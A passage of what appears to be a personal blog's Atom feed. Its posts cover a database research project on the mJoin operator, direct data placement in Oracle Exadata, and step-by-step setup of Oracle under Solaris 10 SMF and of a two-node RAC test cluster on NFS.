   <link href="http://posulliv.github.com/2009/02/20/semester-project"/>
   <updated>2009-02-20T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/02/20/semester-project</id>
   <content type="html">&lt;p&gt;This semester I&amp;#8217;m taking a &lt;a href='http://www.cs.umd.edu/class/spring2009/cmsc724/' target='_blank'&gt;course&lt;/a&gt; in database management systems. For this course, we have to work on a mini-research project in groups. I&amp;#8217;m in a group with 2 other students and the project we decided on was to perform an experimental evaluation of the &lt;a href='http://www.vldb.org/conf/2003/papers/S10P01.pdf' target='_blank'&gt;mJoin&lt;/a&gt; operator. This will involve surveying the prior work on the mJoin operator and performing an implementation of the operator in an open-source DBMS.&lt;/p&gt;

&lt;p&gt;The mJoin operator is essentially an n-ary symmetric hash join operator. For each relation to be joined, a hash table is built on each join attribute. Then for each new tuple, it is inserted into the appropriate hash table(s) and a probe is performed into the hash tables on the other relations. Intermediate tuples are never stored anywhere. One of the issues we will be investigating in this experimental evaluation is whether an operator like the mJoin is more or less efficient than a tree of binary joins. Conventional wisdom says that a tree of binary joins is typically more efficient.&lt;/p&gt;

&lt;p&gt;The first thing we will be doing in the next week or two is looking at various open-source databases and seeing which one would be most suited for us to work with for this project. Basically, the main criteria will be how easy the runtime engine is to work with and how easy it will be to add a new operator. We&amp;#8217;ll have a look at a lot of databases but at the moment, its looking like Postgresql is the one we will work with for the semester. We&amp;#8217;ll also be looking into any related work. The &lt;a href='http://www.cs.umd.edu/~amol/papers/fnt-aqp.pdf' target='_blank'&gt;survey&lt;/a&gt; on adaptive query processing looks like a good starting point for this.&lt;/p&gt;

&lt;p&gt;Some other interesting aspects of the mJoin operator which we hope to investigate are: &lt;ul&gt;
	&lt;li&gt;query optimization with the mJoin operator&lt;/li&gt;
	&lt;li&gt;what applications would benefit from an operator such as this&lt;/li&gt;
	&lt;li&gt;what kind of scenarios is the operator suited for (and not suited for)&lt;/li&gt;
	&lt;li&gt;how difficult it is to add the operator to an existing DBMS&lt;/li&gt;
&lt;/ul&gt; I&amp;#8217;ll try to post regularly throughout the semester on what we are up to and provide updates on what kind of progress we are making. In the meantime, besides working on this project, I&amp;#8217;m trying to contribute to &lt;a href='https://launchpad.net/drizzle' target='_blank'&gt;Drizzle&lt;/a&gt; in as many ways as I possibly can. I&amp;#8217;m mostly working on small bugs and performing some code cleanup tasks.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Drizzle: A Pretty Cool Project</title>
   <link href="http://posulliv.github.com/2009/01/28/drizzle-a-pretty-cool-project"/>
   <updated>2009-01-28T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/01/28/drizzle-a-pretty-cool-project</id>
   <content type="html">&lt;a href=&quot;https://launchpad.net/drizzle&quot;&gt;Drizzle&lt;/a&gt; is a pretty cool project whose progress I've started following in the last few weeks. I'm trying to contribute in a tiny way if I can by confirming bug reports. If I had more time, I'd like to try resolving some bugs. Hopefully, I'll find some spare time to do that in the future.&lt;br /&gt;&lt;br /&gt;I think its definitely a project worth keeping an eye on though. Check it out if you have the time.
</content>
 </entry>
 
 <entry>
   <title>What is Direct Data Placement</title>
   <link href="http://posulliv.github.com/2009/01/06/what-is-direct-data-placement"/>
   <updated>2009-01-06T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/01/06/what-is-direct-data-placement</id>
   <content type="html">&lt;p&gt;I&amp;#8217;m currently studying Oracle&amp;#8217;s &lt;a href='http://www.oracle.com/technology/products/bi/db/exadata/pdf/exadata-technical-whitepaper.pdf'&gt;white paper&lt;/a&gt; on Exadata and came across the following paragraph:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Further, Orace&amp;#8217;s interconnect protocol uses direct data placement (DMA - direct memory access) to ensure very low CPU overhead by directly moving data from the wire to database buffers with no extra data copies being made.&amp;#8221;&lt;/p&gt;

&lt;p&gt;This got me wondering what direct data placement is. First off, the interconnect protocol which Oracle uses in Exadata is &lt;a href='http://oss.oracle.com/projects/rds/'&gt;Reliable Datagram Sockets&lt;/a&gt; (RDSv3). The iDB (intelligent database protocol) that a database server and Exadata Storage Server software use to communicate is built on RDSv3.&lt;/p&gt;

&lt;p&gt;Now, I found some information on direct data placement in a number of RFCs; &lt;a href='http://www.ietf.org/rfc/rfc4096.txt'&gt;RFC 4296&lt;/a&gt;, &lt;a href='http://tools.ietf.org/html/rfc4297'&gt;RFC 4297&lt;/a&gt;, and &lt;a href='http://www.apps.ietf.org/rfc/rfc5041.html'&gt;RFC 5041&lt;/a&gt;. Of the 3 RFCs, I found RFC 5041 (Direct Data Placement over Reliable Transports) to be the most relevant (although they are all worth a quick look). RFC 5041 sums up direct data placement quite nicely:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Direct Data Placement Protocol (DDP) enables an Upper Layer Protocol (ULP) to send data to a Data Sink without requiring the Data Sink to Place the data in an intermediate buffer - thus, when the data arrives at the Data Sink, the network interface can place the data directly into the ULP&amp;#8217;s buffer.&amp;#8221;&lt;/p&gt;

&lt;p&gt;The paragraph from Oracle&amp;#8217;s white paper makes much more sense to me now after briefly reading through the RFC. Since each InfiniBand link in Exadata provides 16 Gb of bandwidth, there would be a large amount of overhead if data had to be placed in an intermediate buffer. Thus, the use of direct data placement makes perfect sense since it reduces CPU overhead associated with copying data through intermediate buffers.&lt;/p&gt;

&lt;p&gt;Also, I believe that in the paragraph quoted from Oracle&amp;#8217;s white paper, it should be RDMA for Remote DIrect Memory Access.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Semester Project Finally Finished</title>
   <link href="http://posulliv.github.com/2008/12/16/semester-project-finally-finished"/>
   <updated>2008-12-16T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/12/16/semester-project-finally-finished</id>
   <content type="html">&lt;p&gt;We just finished our semester project yesterday for the class I am taking on High Performance Computing. It was a pretty interesting project based on the topic of software fault injection.&lt;/p&gt;

&lt;p&gt;More details can be found in the project report &lt;a href='http://www.ece.umd.edu/%7Eposulliv/714_fault_injection_writeup_final.pdf'&gt;here&lt;/a&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Configuring Oracle as a Service in SMF</title>
   <link href="http://posulliv.github.com/2008/11/30/configuring-oracle-as-a-service-in-smf"/>
   <updated>2008-11-30T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/30/configuring-oracle-as-a-service-in-smf</id>
   <content type="html">In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is a component of the so called Predictive Self Healing technology available in Solaris 10. The other component is the Fault Management Architecture.&lt;br&gt;

In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This entails that Oracle will start automatically on boot which means we don't need to go to the bother of writing a startup script for Oracle (even though its not really that hard, see Howard Roger's &lt;a href=&quot;http://www.dizwell.com/prod/node/235?page=0%2C2&quot;&gt;10gR2 installation guide on Solaris&lt;/a&gt; for an example). A traditional startup script could still be created and placed appropriate &lt;code&gt;/etc/rc*.d&lt;/code&gt; directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.&lt;br&gt;

In this post, I am only talking about a single instance environment and I am not using ASM for storage. Also please note that this post is not an extensive guide on how to do this by any
means, it's just a short post on how to get it working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at &lt;a href=&quot;http://docs.sun.com/&quot;&gt;http://docs.sun.com&lt;/a&gt;.&lt;br&gt;

&lt;span style=&quot;font-weight: bold;&quot;&gt;Adding Oracle as a Service&lt;/span&gt;&lt;br&gt;

To create a new service in SMF, a number of steps need to be performed (see the &lt;a href=&quot;http://www.sun.com/bigadmin/content/selfheal/sdev_intro.html&quot;&gt;Solaris Service Management Facility - Service Developer Introduction&lt;/a&gt; for more details). Luckily for me, Joost Mulders has already done all the necessary work for performing this for Oracle. The package for
installing ora-smf is available from &lt;a href=&quot;http://joostm.nl/solaris/smf/ora-smf/ora-smf-1.5.pkg&quot;&gt;here&lt;/a&gt;.&lt;br&gt;

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:&lt;br&gt;

&lt;pre&gt;
# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d orasmf-1.5.pkg
&lt;/pre&gt;

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there

&lt;pre&gt;
# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#
&lt;/pre&gt;

The two files which must be edited are:
&lt;ul&gt;
	&lt;li&gt;oracle-database-instance.xml&lt;/li&gt;
	&lt;li&gt;oracle-listener-instance.xml&lt;/li&gt;
&lt;/ul&gt;
My &lt;code&gt;oracle-database-instance.xml&lt;/code&gt; file looked like the following after I edited it according to my environment:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288466.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

and my &lt;code&gt;oracle-listener-instance.xml&lt;/code&gt; file looked like so after editing:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288469.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is &lt;code&gt;/u01/app/oracle/product/10.2.0/db_1&lt;/code&gt;. I also have a resource project named oracle and the username and group which the Oracle software is installed as is oracle and dba respectively. The most important parameters which must be changed according to your environment are:

&lt;ul&gt;
	&lt;li&gt;ORACLE_HOME&lt;/li&gt;
	&lt;li&gt;ORACLE_SID&lt;/li&gt;
	&lt;li&gt;User&lt;/li&gt;
	&lt;li&gt;Group&lt;/li&gt;
	&lt;li&gt;Project&lt;/li&gt;
	&lt;li&gt;Working Directory (in my case, I set it to the same value as ORACLE_HOME)&lt;/li&gt;
	&lt;li&gt;Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)&lt;/li&gt;
&lt;/ul&gt;

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

&lt;pre&gt;
# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml
&lt;/pre&gt;

Now, shut down the database and listener on the host (since this post presumes you are only configuring one database and listener, it shouldn't be too difficult to configure multiple instances though). Then execute the following to enable the database and listener as an SMF service and start the services:

&lt;pre&gt;
# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER
&lt;/pre&gt;

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Log of this process are available in the /var/svc/log directory.

&lt;pre&gt;
# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#
&lt;/pre&gt;

&lt;span style=&quot;font-weight: bold;&quot;&gt;Testing Out SMF&lt;/span&gt;&lt;br&gt;

Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

&lt;pre&gt;
# ps -ef | grep pmonoracle  
5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113
&lt;/pre&gt;

Roughly 10 to 20 seconds later, the database came back up. Looking at the &lt;code&gt;application-oracle-database:orcl1.log&lt;/code&gt; file, we can see what happened:

&lt;pre&gt;
[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method (&quot;/lib/svc/method/ora-smf stop database orcl1&quot;)]
**********************************************************************
********************************************************************** 
some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method &quot;stop&quot; exited with status 0 ]
[ Apr 26 10:44:53 Executing start method (&quot;/lib/svc/method/ora-smf start database orcl1&quot;) ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method &quot;start&quot; exited with status 0 ]
&lt;/pre&gt;

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!&lt;br&gt;

Now, let's try out the same procedure with the listener service.&lt;br&gt;


Almost instantaneously, the listener came back up. Looking through the &lt;code&gt;application-oracle-listener:LISTENER.log&lt;/code&gt; file shows us what SMF did:

&lt;pre&gt;
[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method (&quot;/lib/svc/method/ora-smf stop listener LISTENER&quot;) ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method &quot;stop&quot; exited with status 0 ]
[ Apr 26 10:47:52 Executing start method (&quot;/lib/svc/method/ora-smf start listener LISTENER&quot;) ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service &quot;PLSExtProc&quot; has 1 instance(s).
Instance &quot;PLSExtProc&quot;, status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method &quot;start&quot; exited with status 0 ]
&lt;/pre&gt;

I havn't really played around too much else with SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.&lt;br&gt;

Also, its worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.
</content>
 </entry>
 
 <entry>
   <title>srvctl Error in Solaris 10 RAC Environment</title>
   <link href="http://posulliv.github.com/2008/11/29/srvctl-error-in-solaris-10-rac-environment"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/srvctl-error-in-solaris-10-rac-environment</id>
   <content type="html">&lt;p&gt;If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the &lt;code&gt;srvctl&lt;/code&gt; utility. As an example, this is likely what you will encounter:&lt;/p&gt;
&lt;pre&gt;
$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$
&lt;/pre&gt;
&lt;p&gt;along with the following messages in the alert log&lt;/p&gt;
&lt;pre&gt;
Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent
&lt;/pre&gt;
&lt;p&gt;This is because the &lt;code&gt;srvctl&lt;/code&gt; utility is unable to get the correct shared memory related settings using &lt;code&gt;prctl&lt;/code&gt; as it reads the settings from the &lt;code&gt;/etc/system&lt;/code&gt; file. This is documented in bug 5340239 on Metalink.&lt;/p&gt;

&lt;p&gt;The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the &lt;code&gt;/etc/system&lt;/code&gt; file, for example:&lt;/p&gt;
&lt;pre&gt;
set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100
&lt;/pre&gt;</content>
 </entry>
 
 <entry>
   <title>Oracle 10gR2 RAC with Solaris 10 and NFS</title>
   <link href="http://posulliv.github.com/2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs</id>
   <content type="html">Recently, I setup a 2 node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.
&lt;br&gt;

I thought it might prove useful to create a post on how this is achieved as I found it to be a relatively quick way to setup a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.
&lt;br&gt;

This post will only detail the steps which are specific to this setup; meaning I wont talk about a number of steps which need to be performed such as setting up user equivalence and creating the database. I will mention when these steps should be performed but I point you to &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html&quot;&gt;Jeffrey Hunter's article &lt;/a&gt;on building a 10gR2 RAC on Linux with iSCSI for more information on steps like this.

&lt;h2&gt;Overview of the Environment&lt;/h2&gt;

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):
&lt;br&gt;

&lt;a href=&quot;../../../images/rac2.jpg&quot;&gt;&lt;img style=&quot;270px;&quot; src=&quot;../../../images/rac2.jpg&quot; border=&quot;0&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;br&gt;

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.
&lt;br&gt;

Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

&lt;h2&gt;Getting Started&lt;/h2&gt;

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website &lt;a href=&quot;http://www.sun.com/software/solaris/get.jsp&quot;&gt;here&lt;/a&gt;. You will need a Sun Online account to access the downloads but registration is free and painless.
&lt;br&gt;

I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found &lt;a href=&quot;http://docs.sun.com/app/docs/doc/817-0544/6mgbagb19?a=view&quot;&gt;here&lt;/a&gt;.
&lt;br&gt;

When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.
&lt;br&gt;

After installation, you should update the &lt;code&gt;/etc/inet/hosts&lt;/code&gt; file on all hosts. For my environment as shown in the diagram above, my &lt;code&gt;hosts&lt;/code&gt; file looked like the following:

&lt;pre&gt;
#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer
&lt;/pre&gt;
&lt;br&gt;
The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are &lt;code&gt;udp_recv_hiwat&lt;/code&gt; and &lt;code&gt;udp_xmit_hiwat&lt;/code&gt;. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.
&lt;br&gt;

To see what these parameters are currently set to, perform the following:

&lt;pre&gt;
# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344
&lt;/pre&gt;
&lt;br&gt;
To set the values of these parameters to 65536 bytes in current memory, perform the following:

&lt;pre&gt;
# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536
&lt;/pre&gt;
&lt;br&gt;
Now we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the &lt;code&gt;/etc/system&lt;/code&gt; file. The values placed in &lt;code&gt;/etc/system&lt;/code&gt; will have no affect on Solaris 10. Bug 5237047 has more information on this.
&lt;br&gt;

So what we will do is to create a startup script called &lt;code&gt;udp_rac&lt;/code&gt; in &lt;code&gt;/etc/init.d&lt;/code&gt;. This script will have the following contents:

&lt;pre&gt;
#!/sbin/sh
case &quot;$1&quot; in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo &quot;Usage: $0 { start | state }&quot;
exit 1
;;
esac
&lt;/pre&gt;
&lt;br&gt;
Now, we need to create a link to this script in the &lt;code&gt;/etc/rc3.d&lt;/code&gt; directory:

&lt;pre&gt;
# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configuring the NFS Filer&lt;/h2&gt;

Now that we have Solaris installed on all our machines, its time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive you can ignore the next paragraph.
&lt;br&gt;

In my &lt;a
href=&quot;http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10.html&quot;&gt;previous post&lt;/a&gt;, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.
&lt;br&gt;

Now, I have a UFS file system created on the &lt;code&gt;/dev/dsk/c2t0d0s0&lt;/code&gt; device. I will create a directory for mounting this file system and then mount it:

&lt;pre&gt;
# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac
&lt;/pre&gt;
&lt;br&gt;
Now that we have created the base directory, lets create directories inside this which will contain the various files for our RAC environment.

&lt;pre&gt;
# cd /export/rac
# mkdir crs_files
# mkdir oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;/export/rac/crs_files&lt;/code&gt; directory will contain the OCR and the voting disk files used by Oracle Clusterware. The &lt;code&gt;/export/rac/oradata&lt;/code&gt; directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.
&lt;br&gt;

Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...
&lt;br&gt;

Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the &lt;code&gt;/etc/dfs/dfstab&lt;/code&gt; file to specify which directories we want to share and what options we want to use when sharing them. The &lt;code&gt;dfstab&lt;/code&gt; file I configured looked like so:

&lt;pre&gt;
#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d &quot;&quot;]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d &quot;home dirs&quot;  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;anon&lt;/code&gt; option in the &lt;code&gt;dfstab&lt;/code&gt; file as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.
&lt;br&gt;

After editing the &lt;code&gt;dfstab&lt;/code&gt; file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

&lt;pre&gt;
# svcadm restart nfs/server
&lt;/pre&gt;

To check if the directories are exported correctly, the following can be performed from the NFS filer:

&lt;pre&gt;
# share
-               /export/rac/crs_files   rw,anon=175   &quot;&quot;
-               /export/rac/oradata     rw,anon=175   &quot;&quot;
#
&lt;/pre&gt;

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (&lt;code&gt;solaris1&lt;/code&gt; and &lt;code&gt;solaris2&lt;/code&gt; in my case):

&lt;pre&gt;
# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#
&lt;/pre&gt;
&lt;br&gt;
The output should be the same on both nodes.

&lt;h2&gt;Configure NFS Exports on Oracle RAC Nodes&lt;/h2&gt;

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:

&lt;pre&gt;
# mkdir /u02
# mkdir /u03
&lt;/pre&gt;
&lt;br&gt;
I am not using &lt;code&gt;u01&lt;/code&gt; as I'm using this directory for installing the software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible but that might serve as a good future blog post.
&lt;br&gt;

For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:

&lt;pre&gt;
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03
&lt;/pre&gt;
&lt;br&gt;
Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file. The extra lines which I added to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):

&lt;pre&gt;
solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configure the Solaris Servers for Oracle&lt;/h2&gt;

Now that we have shared storage setup, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) will look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the &lt;code&gt;/usr/bin&lt;/code&gt; directory by default. The OUI will throw an error stating that it cannot find the &lt;code&gt;ssh&lt;/code&gt; or &lt;code&gt;scp&lt;/code&gt; binaries. My simple workaround was to simply create a symbolic link in the &lt;code&gt;/usr/local/bin&lt;/code&gt; directory for these binaries.

&lt;pre&gt;
# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp
&lt;/pre&gt;
&lt;br&gt;
You should also create the oracle user and directories now before configuring kernel parameters.
&lt;br&gt;

For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to &lt;a href=&quot;http://www.dizwell.com/prod/node/235&quot;&gt;this excellent installation guide&lt;/a&gt; for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

&lt;h2&gt;What's Left to Do&lt;/h2&gt;

